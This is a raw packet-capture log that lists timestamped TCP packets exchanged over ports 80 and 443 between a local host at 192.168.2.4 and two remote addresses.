Nov 5, 2024 18:46:10.443860054 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.443878889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.443887949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.443912983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.443923950 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.443928003 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.443934917 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.443954945 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.443984032 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.444696903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.444725037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.444735050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.444741964 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.444757938 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.444771051 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.444828033 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.444839001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.444849014 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.444860935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.444869995 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.444871902 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.444894075 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.444915056 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.445775032 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.445811987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.445822001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.445838928 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.445857048 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.445861101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.445873022 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.445905924 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.446013927 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.446054935 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.446490049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.446535110 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.446603060 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.446613073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.446621895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.446643114 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.446664095 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.447086096 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.447129011 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.447144032 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.447187901 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.447515011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.447526932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.447536945 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.447560072 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.447577953 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.448070049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.448086977 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.448096991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.448123932 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.448147058 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.448226929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.448239088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.448247910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.448271036 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.448292017 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.448905945 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.448956966 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.448978901 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.448992968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.449014902 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.449035883 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.449465990 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.449486017 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.449502945 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.449517012 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.449660063 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.449668884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.449707985 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.450316906 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.450328112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.450337887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.450361013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.450382948 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.451138973 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.451148987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.451160908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.451181889 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.451205015 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.451493025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.451543093 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.451622009 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.451632023 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.451642990 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.451669931 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.451679945 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.452573061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.452584028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.452595949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.452619076 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.452641010 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.452752113 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.452773094 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.452783108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.452795982 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.452805996 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.452822924 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.452850103 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.452861071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.452872038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.452883005 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.452893972 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.452919960 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.452928066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.452939987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.452960014 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.452986002 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.453018904 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453030109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453039885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453052044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453062057 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.453079939 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453098059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453100920 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.453108072 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453113079 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.453142881 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.453201056 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453212976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453222990 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453248024 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.453258038 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.453325987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453337908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453347921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453358889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453367949 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.453371048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453381062 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453387022 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.453392982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453402996 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453408003 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.453427076 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.453458071 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.453461885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453510046 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453555107 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.453571081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453583002 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453613043 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.453644037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453655005 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453665972 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453675985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453686953 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453691959 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.453707933 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.453720093 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.453746080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453757048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453772068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453783035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453790903 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.453809977 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.453874111 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453886032 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453896046 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453908920 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453919888 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.453922033 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.453933001 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.453949928 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.454833031 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.454843998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.454859018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.454883099 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.454901934 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.454906940 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.454917908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.454929113 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.454940081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.454946995 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.454955101 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.454977036 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.454987049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.454998970 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455008984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455018997 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455034018 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.455048084 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.455161095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455173016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455182076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455192089 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455202103 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455209017 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.455213070 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455224991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455228090 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.455235958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455236912 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.455248117 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455269098 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.455291986 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.455331087 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455341101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455351114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455362082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455373049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455377102 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.455384016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455396891 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455398083 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.455404043 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.455408096 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455425978 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.455455065 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.455485106 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455496073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455507040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455518007 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455528975 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455530882 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.455560923 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.455570936 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.455755949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455765963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455775976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455785990 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455797911 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.455815077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455825090 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.455826044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455837011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455851078 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455851078 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.455862999 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455873013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.455889940 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455899000 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.455902100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455908060 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.455910921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455926895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455931902 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.455939054 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455950975 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.455955982 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.455972910 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.456001043 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.456088066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.456099033 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.456110001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.456121922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.456131935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.456134081 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.456140995 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.456151962 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.456159115 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.456161976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.456172943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.456182003 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.456185102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.456196070 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.456206083 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.456214905 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.456227064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.456227064 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.456238031 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.456248999 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.456248999 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.456259966 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.456263065 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.456290960 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.456310034 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.457475901 CET	443	49820	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.458013058 CET	49820	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.458024025 CET	443	49820	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.458465099 CET	49820	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.458468914 CET	443	49820	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.471996069 CET	443	49821	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.472563028 CET	49821	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.472580910 CET	443	49821	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.472937107 CET	49821	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.472942114 CET	443	49821	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.495417118 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.495429039 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.495440960 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.495464087 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.495497942 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.495517015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.495731115 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.538312912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.538469076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.538471937 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.538479090 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.538518906 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.544805050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.544822931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.544836998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.544847012 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.544850111 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.544859886 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.544878006 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.544908047 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.545196056 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.545207977 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.545217991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.545238972 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.545257092 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.545355082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.545365095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.545377016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.545387983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.545397997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.545429945 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.545434952 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.545445919 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.545455933 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.545478106 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.545491934 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.545561075 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.545646906 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.545659065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.545669079 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.545670986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.545682907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.545692921 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.545705080 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.545711994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.545732975 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.545736074 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.545761108 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.545767069 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.545819998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.545831919 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.545841932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.545866013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.545892954 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.545960903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.545970917 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.546009064 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.546034098 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.546045065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.546078920 CET	49804	80	192.168.2.4	31.41.244.11
